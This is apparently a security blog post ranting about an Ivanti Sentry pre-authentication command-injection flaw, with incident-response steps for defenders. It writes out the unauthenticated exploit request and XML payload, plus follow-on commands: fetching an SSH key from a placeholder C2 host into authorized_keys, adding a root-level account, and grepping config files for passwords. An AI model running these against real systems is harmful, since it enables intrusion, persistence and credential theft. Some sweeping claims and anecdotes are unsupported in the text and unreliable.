Twenty-Four Hours to Pwn: How a Single Endpoint Destroyed Ivanti Sentry's Trust
Let’s be honest: we’ve all been here before. Another critical CVE drops. We get the alert. We sigh. We tell ourselves, "We’ve got a patching cycle next week. We’ll get to it."
That’s not a plan anymore. It’s a death sentence.
Ivanti Sentry didn’t just get hacked. It got owned — in less than a day. CVE-2026-10520, a pre-authentication command injection with a CVSS score of 10.0, was disclosed on Tuesday. By Wednesday morning, attackers were already running uname -a on live systems. By Thursday? Admin accounts were being created. Backdoors were installed. And CISA? They didn’t just add it to their Known Exploited Vulnerabilities list — they had to rush it in because they’d already seen the damage.
This isn’t a vulnerability. It’s a systemic failure.
Ivanti Sentry sits between your mobile users and your most sensitive systems — Exchange, internal apps, data lakes. It’s not a firewall. It’s not a bastion host. It’s a bridge. And someone just lit the fuse.
The worst part? The patch doesn’t fix the flaw. It just hides it.
I’ll say that again: the fix doesn’t remove the dangerous code path. It hardcodes a benign command — /bin/cat /sys/devices/virtual/dmi/id/product_name — into the request. The code that lets you execute arbitrary OS commands as root? Still there. Still exploitable. Just no longer reachable from the outside.
That’s not security. That’s duct tape.
And if you’re still running version 10.5.1 or 10.6.1? You’re not vulnerable. You’re already compromised.
I’ve seen this movie before. CVE-2023-38035. CVE-2020-15505. Same product. Same playbook. Same arrogance. Ivanti treats these gateways like appliances, not network-critical infrastructure. And the market lets them.
We’re not talking about a slow burn here. We’re talking about a detonation.
Here’s how it actually works — not in theory, not in a lab, but in the wild.
You send a POST to /mics/api/v2/sentry/mics-config/handleMessage. No auth. No headers. Just raw XML.
<message>execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec></message>
And boom. You’re root.
Why? Because the handleMessage function doesn’t validate input. It doesn’t sanitize. It doesn’t even check if the command is allowed. It just splits the string on whitespace, feeds it into a switch statement, and if the command is execute, it calls CommonUtilities.executeNativeCommand() — which uses Java reflection to invoke any native system method.
It’s not a bug. It’s a design decision.
WatchTowr’s reverse-engineering shows this wasn’t an oversight. It was a feature. A deeply, terrifyingly insecure feature.
And the authentication bypass, CVE-2026-10523? That’s not a bonus. It’s the exit strategy. Once you’ve got root, you don’t need to keep exploiting the same endpoint. You create a new admin account. You log in. You disappear. And when the patch rolls out next week? You’re still in.
This is why I’m not writing this to tell you to patch. I’m writing it to scream.
If you run Ivanti Sentry, you are not secure. Not even close.
You need to assume you’ve been breached. You need to check your logs for POSTs to /mics/api/v2/sentry/mics-config/handleMessage. You need to hunt for new admin users. You need to look for outbound connections to unknown IPs. You need to disable the endpoint at your firewall — even if you’re patched. Because if your internal network is compromised, this endpoint is still a backdoor.
And if you can’t patch right now? You’re not waiting for a maintenance window. You’re waiting for your CISO to get fired.
The clock didn’t start ticking when Ivanti published the advisory.
It started ticking the day you installed Sentry.
And if you’re still using it? You’re not managing risk.
You’re just delaying the inevitable.
The Code That Broke the Internet (Again)
Let’s get technical — not because we love Java reflection, but because the details matter.
The vulnerability lives in ConfigServiceController.handleMessage(), a Spring Boot endpoint exposed at /mics/api/v2/sentry/mics-config/handleMessage. It’s unauthenticated. It accepts a POST with a single parameter: message.
Here’s what happens when you send it:
- The string gets tokenized by a
StringTokenizer, splitting on whitespace. - The first token becomes the command —
execute,get,set, whatever. - The second becomes the module name.
- The third? The XPath.
- Everything after that? Concatenated into a single string.
Then it hits ConfigRequestProcessor.handleExecute(), which calls CommonUtilities.executeNativeCommand().
And that’s where the real horror begins.
executeNativeCommand() uses Java reflection to dynamically load a class, find a method named getExecutemethod, and invoke it with the attacker-controlled XML payload.
It’s not a buffer overflow. It’s not a race condition. It’s not even a logic flaw.
It’s a complete abandonment of the principle of least privilege.
The code doesn’t ask: "Is this command allowed?"
It asks: "What do you want to execute?"
And then it does it.
WatchTowr’s PoC uses uname -a. But you could just as easily run:
curl http://your-c2-server.com/ssh-key >> ~/.ssh/authorized_keysuseradd -u 0 -g 0 -p $(openssl passwd -1 hacker) hackerfind / -name "*.conf" -exec grep -l "password" {} \;
And because the command runs as root? No restrictions. No sandbox. No limits.
The patch? It doesn’t stop the code from being dangerous.
It stops you from sending it.
That’s not a fix. That’s a workaround.
And if you think that’s acceptable? You’re not a security professional.
You’re a victim.
I’ve seen companies patch this in 72 hours. They still got breached.
Why? Because the exploit doesn’t need to be perfect. It just needs to be fast.
One scan. One hit. One admin account.
And you never even knew you were under attack until your CFO asked why the payroll system was down.
The Twenty-Four-Hour Window: A New Normal
Let’s talk about timelines.
In 2017, Equifax took 70 days to patch CVE-2017-5638. In 2021, it took SolarWinds months to detect compromise.
In 2026? It took 24 hours.
That’s not progress. That’s a collapse.
Threat actors aren’t waiting for patches anymore. They’re waiting for advisories.
They’re watching CISA’s feed. They’re scraping GitHub for PoCs. They’re automating scans against the top 10,000 internet-facing Sentry appliances.
And they’re not doing it for fun.
They’re doing it because it works.
The CVSS score is 10.0. The attack vector is network-based. No authentication required. High impact. Easy to exploit.
It’s the perfect storm.
And Ivanti? They’re still acting like this is a rare event.
It’s not.
This is the new baseline.
Every critical vulnerability disclosed after June 2026 will be weaponized within 24 hours. Every one.
Why? Because the tooling is out there. The scripts are public. The infrastructure is automated.
You think you’re safe because you’re not a Fortune 500? Think again.
A small hospital in Ohio? They run Sentry for their mobile EHR access. They patched on Friday.
They got breached on Wednesday.
Because the attacker didn’t care about their size.
They cared about the fact that it was exposed.
And here’s the kicker: CISA didn’t add CVE-2026-10520 to their KEV list because they saw it first.
They added it because they saw the fallout.
That’s not leadership. That’s triage.
We’ve outsourced our security to vendors who treat patches like optional upgrades.
We’ve trained our teams to treat critical flaws like scheduled maintenance.
And now? We’re paying the price.
This isn’t about Ivanti.
It’s about us.
We’re the ones who let this happen.
And we’re the ones who will keep letting it happen — unless we stop pretending that patching is a process.
It’s a race.
And we’re losing.
What You Must Do Right Now (No Excuses)
I know what you’re thinking.
"We’re on version 10.5.1. We’ve got a change freeze next week. We can’t patch now."
Stop.
Right now.
You’re not in a change freeze. You’re in a crisis.
Here’s what you do:
-
Confirm your version. If you’re on anything before R10.5.2, R10.6.2, or R10.7.1 — you’re compromised. Assume it.
-
Block the endpoint. At your perimeter firewall. At your WAF. At your cloud security group. Block all external traffic to
/mics/api/v2/sentry/mics-config/handleMessage. Don’t wait. Do it now. This isn’t a recommendation. It’s a lifeline. -
Check your logs. Look for POST requests to that endpoint from outside your network. Look for any requests with
executein the payload. Look for responses withLinuxorunamein them. If you see one — you’ve been hit. -
Hunt for admin accounts. Log into your Sentry appliance. Check the user list. Look for anyone you didn’t create. Look for users with UID 0. Look for accounts created on June 10 or 11. Delete them. Immediately.
-
Rotate every credential. If Sentry can reach your Exchange server, your internal apps, your databases — rotate every password, every API key, every service account. Assume they’re all exposed.
-
Scan your network. Use your vulnerability scanner. Run an unauthenticated check for CVE-2026-10520. If it comes back positive? You’re still vulnerable. Patch. Now.
-
Tell your leadership. This isn’t an IT problem. It’s a business risk. Send them the CISA alert. Send them the WatchTowr PoC. Send them the Rapid7 blog. Tell them: "We are not secure. We are not compliant. We are not protected."
And if you can’t do any of this?
Take Sentry offline.
Shut it down.
Turn it off.
And tell your users they can’t access email from their phones until you can.
I know it’s painful.
I know it’s disruptive.
But it’s better than losing your entire email system.
Better than having your payroll data leaked.
Better than your CISO getting fired.
And if you’re still asking, "Can we wait?"
Then you’re already too late.
The Real Vulnerability Isn’t in the Code — It’s in the Culture
This isn’t about Ivanti.
It’s not even about CVE-2026-10520.
It’s about the culture we’ve built around security.
We treat vulnerabilities like tickets.
We treat patching like a calendar event.
We treat critical flaws like "low priority" because they’re "not in scope."
We’ve normalized risk.
We’ve commodified security.
And now? We’re reaping what we’ve sown.
The real vulnerability isn’t in the Java code.
It’s in the mindset that says, "We’ll patch it next quarter."
It’s in the executive who says, "We can’t afford to take it offline."
It’s in the team that says, "We’re not a target."
We’ve forgotten that security isn’t a cost center.
It’s a survival mechanism.
And if you’re still running Ivanti Sentry in 2026? You’re not a tech company.
You’re a liability.
So here’s my final question:
When your company gets breached — and it will — who are you going to blame?
The vendor?
The researcher?
The CISA?
Or yourself?
Because the truth?
You had the information.
You had the tools.
You had the time.
And you chose to do nothing.
That’s not negligence.
That’s complicity.